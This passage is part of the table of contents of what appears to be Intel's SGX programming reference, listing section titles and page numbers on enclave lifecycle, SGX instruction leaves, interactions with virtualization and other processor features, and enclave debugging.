EEXTEND Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.1.2 EINIT Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.2 Enclave Entry and Exiting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.1 Synchronous Entry and Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-3 iv Ref. #329298-001 3.2.2 Asynchronous Enclave Exit (AEX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.3 Resuming Execution after AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.2.3.1 ERESUME Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3 Calling Enclave Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.1 Calling Convention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.2 Register Preservation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.3 Returning to Caller. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.4 SGX Key and Attestation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.5 EPC and Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.1 EPC Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.2 OS Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.3 Eviction of Enclave Pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.4 Loading an Enclave Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.5 Eviction of an SECS Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.5.6 Eviction of a Version Array Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6 Changes to Instruction Behavior Inside an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.1 Illegal Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.2 RDRAND and RDSEED Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.3 PAUSE Instruction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.4 INT 3 Behavior Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.5 INVD Handling when Enclaves Are Enabled . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 CHAPTER 4 ENCLAVE EXITING EVENTS 4.1 Compatible Switch to the Exiting Stack of AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-1 4.2 State Saving by AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-2 4.3 Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-3 4.3.1 Processor Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-3 4.3.2 Synthetic State for Extended Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.3.3 VMCS Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.4 AEX Flow. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 4.4.1 AEX Operational Detail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 CHAPTER 5 INSTRUCTION REFERENCES 5.1 SGX InstructIon Syntax and Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.1 ENCLS Register Usage Summary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.2 ENCLU Register Usage Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.3 Information and Error Codes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.4 Internal CREGs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5 Concurrent Operation Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5.1 Concurrency Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-4 5.2 SGX InstructIon Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-5 ENCLS—Execute an Enclave System Function of Specified Leaf Number . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-6 ENCLU—Execute an Enclave User Function of Specified Leaf Number. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-8 5.3 SGX System Leaf Function Reference. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-11 EADD—Add a Page to an Uninitialized Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-12 EBLOCK—Mark a page in EPC as Blocked . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-16 ECREATE—Create an SECS page in the Enclave Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19 EDBGRD—Read From a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-23 EDBGWR—Write to a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-26 EEXTEND—Extend Uninitialized Enclave Measurement by 256 Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-29 EINIT—Initialize an Enclave for Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-32 ELDB/ELDU—Load an EPC page and Marked its State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-38 EPA—Add Version Array . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-42 EREMOVE—Remove a page from the EPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-44 ETRACK—Activates EBLOCK Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-47 EWB—Invalidate an EPC Page and Write out to Main Memory. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-49 5.4 SGX User Leaf Function Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 Ref. #329298-001 v 5.4.1 Instruction Column in the Instruction Summary Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 EENTER—Enters an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-54 EEXIT—Exits an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-61 EGETKEY—Retrieves a Cryptographic Key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-64 EREPORT—Create a Cryptographic Report of the Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-71 ERESUME—Re-Enters an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-75 CHAPTER 6 SGX INTERACTIONS WITH IA32 AND INTEL 64 ARCHITECTURE 6.1 SGX Availability in Various Processor Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.2 IA32_FEATURE_CONTROL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3 Interactions with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3.1 Scope of Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.2 Interactions of SGX Instructions with Instruction Prefixes and Addressing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.3 Interaction of SGX Instructions with Segmentation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-2 6.3.4 Interactions of Enclave Execution with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-2 6.4 Interactions with Paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5 Interactions with VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5.1 Availability of SGX under VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.2 Setting of CR4.SEE Bit under VMX Operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.3 VMM Controls on Exposing SGX to the Guest. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.4 VMX Capability Enumeration MSRs and SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.1 Guest State Area - Guest Non-Register State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.2 VM-Execution Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.3 Basic Exit Reasons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.5 VM Exits While Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.6 VM Entry Consistency Checks and SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.7 VM Execution Control Setting Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.8 Guest Interruptibility State Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.9 Interaction of SGX with Various VMMs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.10 Interactions with EPTs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.11 Interactions with APIC Virtualization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.12 Interactions with Monitor Trap Flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.6 SGX Interactions with Architecturally-visible Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-7 6.7 Interactions with the XSAVE/XRSTOR Processor Extended States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-7 6.7.1 Requirements and Architecture Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-7 6.7.2 Relevant Fields in Various Data Structures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.1 SECS.ATTRIBUTES.XFRM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.2 SECS.SSAFRAMESIZE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.3 XSAVE Area in SSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.3 Processor Extended States and ENCLS[ECREATE] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4 Processor Extended States and ENCLU[EENTER] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5 Processor Extended States and AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5.1 State Saving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5.2 State Synthesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6 Processor Extended States and ENCLU[ERESUME] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.7 Processor Extended States and ENCLU[EEXIT] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8 Interactions with SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.1 Availability of SGX instructions in SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.2 SMI while Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.8.3 SMRAM Synthetic State of AEX Triggered by SMI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.9 Interactions of INIT, SIPI, and Wait-for-SIPI with SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.10 Interactions with DMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11 Interactions with Memory Configuration and Various Memory Ranges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.1 Memory Type Considerations for PRMRR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2 Interactions of PRMRR with Various Memory Regions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 vi Ref. #329298-001 6.11.2.1 Interactions of PRMRR with SMRR. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.2 Interactions of PRMRR with MTRRs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.3 Interactions of PRMRR with MMIO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.2.4 Interactions of PRMRR with IA32_APIC_BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.3 Interactions of PRMRR with Virtual APIC Page. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.3.1 Interactions of PRMRR with Physical Memory Accesses. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.4 Interactions of SGX with APIC Access Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12 Interactions with TXT. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.1 Enclaves Created Prior to Execution of GETSEC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.2 Interaction of GETSEC with SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.13 Interactions with Caching of Linear-address Translations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.14 Interactions with Intel® Transactional Synchronization Extensions (Intel® TSX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.14.1 HLE and RTM Debug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.15 SGX Interactions with S states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16 SGX Interactions with Machine Check Architecture (MCA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.1 Interactions with MCA Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.2 Machine Check Enables (IA32_MCi_CTL). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.3 CR4.MCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-16 CHAPTER 7 ENCLAVE CODE DEBUG AND PROFILING 7.1 Configuration and Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.1.1 Debug Enclave vs. Production Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.1.2 Tool-chain Opt-in . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2 Single Step Debug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2.1 Single Stepping Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-1 7.2.2 Single Stepping ENCLS Instruction Leafs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.3 Single Stepping ENCLU Instruction Leafs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4 Single-stepping Enclave Entry with Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4.1 Single Stepping without AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-2 7.2.4.2 Single Step Preempted by AEX due to Non-SMI Event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.5 RFLAGS.TF Treatment on AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.6 Restriction on Setting of TF after an Opt-out Entry. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-3 7.2.7 Trampoline Code Considerations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3 Code and Data Breakpoints. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 